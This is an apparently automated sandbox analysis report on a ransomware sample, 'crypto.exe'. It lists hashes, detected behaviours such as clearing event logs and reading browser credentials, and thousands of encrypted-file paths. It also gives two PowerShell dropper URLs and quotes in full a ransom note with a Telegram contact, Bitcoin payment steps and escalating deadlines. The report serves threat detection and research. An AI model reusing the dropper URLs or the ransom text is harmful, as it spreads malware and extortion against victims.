5531b27552a5a74235a72d91d42fbf5b643806a0c1ca01c32a8e74d87c6af732

Analysis

max time kernel
143s
max time network
86s
platform
windows7_x64
resource
win7
submitted
23-09-2020 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

crypto.exe
Size

2.7MB
MD5

09af06e9c8666c02df5cb4f23191ad50
SHA1

656ce686290b5d9a40b62a79cdfe72015912a89c
SHA256

5531b27552a5a74235a72d91d42fbf5b643806a0c1ca01c32a8e74d87c6af732
SHA512

b5c0c8c2f20cff6fc50ef35f6637344fdeb8ef8d17c5d73b68acf0d4b8f1b66a7cd6044dfa97a9bfa4c23a9946ab9bb9fc7d1022e755a42ebb1e040d2b6de89b

Score

10^/10

ransomware spyware evasion

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/clear.txt

Extracted

Language

ps1

Source

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/video.mp4

Extracted

Path

C:\Only_We_Can_Help_You.txt

Ransom Note

All of your important files encrypted with AES-256, RSA-2848 , is a powerful cryptography algorithm For more information you can use Wikipedia *attention: Don't rename or edit encrypted files because it will be impossible to decrypt your files This is a private ransomware developed by our team and there is no decryption file for it For Trust You can Send us Test Files And We Decrypt That And Send To You. *How do I contact you? The only way to communicate is through a secure Telegram messenger Telegram ID : https://t.me/Only_We_Can_Help_You Your unique Id : TTOHRFUMG How To Access Telegram To access Telegram, you must install the version related to your platform You can download Telegram from https://telegram.org #How to recover files? How files are decrypted? What is the decryption file like? Watch file Watch-me.mp4 on each drive and desktop You need two key 1-Public key: you need it for encryption 2-Private Key: you need it for decryption So you need Private key to recover your files. All of your network computers files is encrypted with one public key. So you need just one Private key to recover all computers files The private Key that we will send works on all your computers #How to use private Key? We send you a simple software with private Key And you just need run this software on each computer that encrypted and all affected files will be decrypted *What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, because it harms our business You Have 24 hours to Decide to Pay after 48 hours Decryption Price will Be Double And after 72 hours it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. #deadline You just have 72 hours to send us the Bitcoin after 72 hours we will remove your private key and it's impossible to recover your files #What is Bitcoin? Bitcoin is an innovative payment network and a new kind of money. You can create a Bitcoin account at https://blockchain.info/ and deposit some money into your account and then send to us #How to buy Bitcoin? There are Many way to buy Bitcoin and deposit it into your account, You can buy it with WesternUnion, Bank Wire, International Bank transfer, Cash deposit and etc https://localbitcoins.com ---> Buy Bitcoin with WesternUnion or MoneyGram https://coincafe.com ---> Buy Bitcoin fast and Secure with WesternUnion and Cash deposit https://www.bitstamp.net ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment httos://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.ccedk.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://bitcurex.com/ ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment If you want to pay with your Business bank account you should create a business account in exchangers they don't accept payment from third party

URLs

https://t.me/Only_We_Can_Help_You

Extracted

Path

C:\Users\Public\Desktop\Only_We_Can_Help_You.html

Ransom Note

All of your important files encrypted with AES-256, RSA-2848 , is a powerful cryptography algorithm For more information you can use Wikipedia *attention: Don't rename or edit encrypted files because it will be impossible to decrypt your files This is a private ransomware developed by our team and there is no decryption file for it For Trust You can Send us Test Files And We Decrypt That And Send To You. *How do I contact you? The only way to communicate is through a secure Telegram messenger Telegram ID : https://t.me/Only_We_Can_Help_You Your unique Id : TTOHRFUMG How To Access Telegram To access Telegram, you must install the version related to your platform You can download Telegram from https://telegram.org #How to recover files? How files are decrypted? What is the decryption file like? Watch file Watch-me.mp4 on each drive and desktop You need two key 1-Public key: you need it for encryption 2-Private Key: you need it for decryption All of your network computers files is encrypted with one public key. So you need just one Private key to recover all computers files The private Key that we will send works on all your computers #How to use private Key? We send you a simple software with private Key And you just need run this software on each computer that encrypted and all affected files will be decrypted *What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, because it harms our business You Have 24 hours to Decide to Pay after 48 hours Decryption Price will Be Double And after 72 hours it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. #deadline You just have 72 hours to send us the Bitcoin after 72 hours we will remove your private key and it's impossible to recover your files #What is Bitcoin? Bitcoin is an innovative payment network and a new kind of money. You can create a Bitcoin account at https://blockchain.info/ and deposit some money into your account and then send to us #How to buy Bitcoin? There are Many way to buy Bitcoin and deposit it into your account, You can buy it with WesternUnion, Bank Wire, International Bank transfer, Cash deposit and etc https://localbitcoins.com ---> Buy Bitcoin with WesternUnion or MoneyGram https://coincafe.com ---> Buy Bitcoin fast and Secure with WesternUnion and Cash deposit https://www.bitstamp.net ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment httos://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.ccedk.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://bitcurex.com/ ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment If you want to pay with your Business bank account you should create a business account in exchangers they don't accept payment from third party

URLs

https://t.me/Only_We_Can_Help_You

Signatures

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070

Blacklisted process makes network request 2 IoCs

flow	pid	Process
6	1048	powershell.exe
8	928	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 9907 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Rome.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libanaglyph_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\prism-d3d.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01638_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00394_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SUMER_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\default_thumb.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107024.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15276_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Angles.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Nassau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Andorra.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libsdl_image_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\wsdetect.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\NOTEL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106958.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Graph.exe.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendtoOneNoteFilter.gpd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Currency Rates.iqy.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\si.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105490.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199036.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ms.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\WIND.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\br.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01157_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02263_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02958_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\LAUNCH.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBrowserUpgrade.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN065.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00336_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14655_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15061_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR19F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_off.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL012.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Dublin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Status.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\JNTFiltr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090390.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONTAB32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\RADAR.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\CALENDAR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB01741L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00241_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00006_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDCNCLL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21334_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CGMIMP32.HLP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DOC.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Installed_schemas14.xss.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fi.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_sse2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01636_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XML2WORD.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOHTMED.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\LINES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\wsdetect.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpOAV.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Black Tie.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233312.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10289_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00938_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Aspect.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libafile_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Formal.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libtimecode_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\83.0.4103.106.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsFormTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.Id-TTOHRFUMG.sec	crypto.exe
